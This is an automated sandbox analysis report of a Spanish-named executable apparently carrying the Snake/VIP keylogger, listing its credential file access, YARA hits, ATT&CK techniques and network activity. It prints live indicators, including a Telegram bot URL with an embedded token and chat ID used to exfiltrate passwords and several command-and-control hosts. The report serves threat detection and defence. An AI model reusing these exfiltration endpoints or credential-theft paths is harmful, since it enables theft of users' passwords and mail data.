Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 5.2.PRESUPUESTO DE NOVIEMBRE...exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4a5a580.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.4adf3a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PRESUPUESTO DE NOVIEMBRE...exe.49d5760.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 1388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PRESUPUESTO DE NOVIEMBRE...exe PID: 7336, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PRESUPUESTO DE NOVIEMBRE...exe	45%	ReversingLabs	ByteCode-MSIL.Spyware.Negasteal
PRESUPUESTO DE NOVIEMBRE...exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.247.73	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/173.254.250.77	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB_q	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032E6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=enlB_q	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032B5000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://tempuri.org/DataSet1.xsd	PRESUPUESTO DE NOVIEMBRE...exe	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000032EB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/173.254.250.77$	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.000000000319A000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?L	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20a	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003209000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003316000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003328000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003121000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004141000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3754478872.0000000004432000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	PRESUPUESTO DE NOVIEMBRE...exe, 00000002.00000002.1314729727.00000000047AA000.00000004.00000800.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3747597156.0000000000402000.00000040.00000400.00020000.00000000.sdmp, PRESUPUESTO DE NOVIEMBRE...exe, 00000005.00000002.3750107990.0000000003171000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545933
Start date and time:	2024-10-31 10:34:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PRESUPUESTO DE NOVIEMBRE...exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/1@4/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 102 Number of non-executed functions: 14
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: PRESUPUESTO DE NOVIEMBRE...exe

Simulations

Behavior and APIs

Time	Type	Description
05:35:00	API Interceptor	9527548x Sleep call for process: PRESUPUESTO DE NOVIEMBRE...exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe	Get hash	malicious	AgentTesla	Browse
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	9RgE5uOJwX.exe	Get hash	malicious	XWorm	Browse
188.114.97.3	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.timizoasisey.shop/3p0l/
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	paste.ee/d/vdlzo
	Purchase_Order_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	touxzw.ir/alpha2/five/fre.php
	rPO-000172483.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/2b9b/
	rPO_28102400.exe	Get hash	malicious	Lokibot	Browse	ghcopz.shop/ClarkB/PWS/fre.php
	PbfYaIvR5B.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
	SR3JZpolPo.exe	Get hash	malicious	JohnWalkerTexasLoader	Browse	xilloolli.com/api.php?status=1&wallets=0&av=1
	5Z1WFRMTOXRH6X21Z8NU8.exe	Get hash	malicious	Unknown	Browse	artvisions-autoinsider.com/8bkjdSdfjCe/index.php
132.226.247.73	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	rShippingDocuments240384.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
checkip.dyndns.com	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	rCommercialoffer_Technicaloffer_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	PG567777878-H677889978-6G89O9I4567778.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	158.101.44.242
api.telegram.org	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Fernissagerne.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	JUSTIFICANTE PAGO FRAS OCTUBRE 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	9RgE5uOJwX.exe	Get hash	malicious	XWorm	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Purchase Order 17025.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO 4500580954.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Factura Honorarios 2024-10.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	.gov.ua.html	Get hash	malicious	Unknown	Browse	172.67.142.245
	Gun Ici Cek Statu Listesi.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	PO Number- 4900003753.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	.gov.ua.html	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWorm	Browse	188.114.97.3
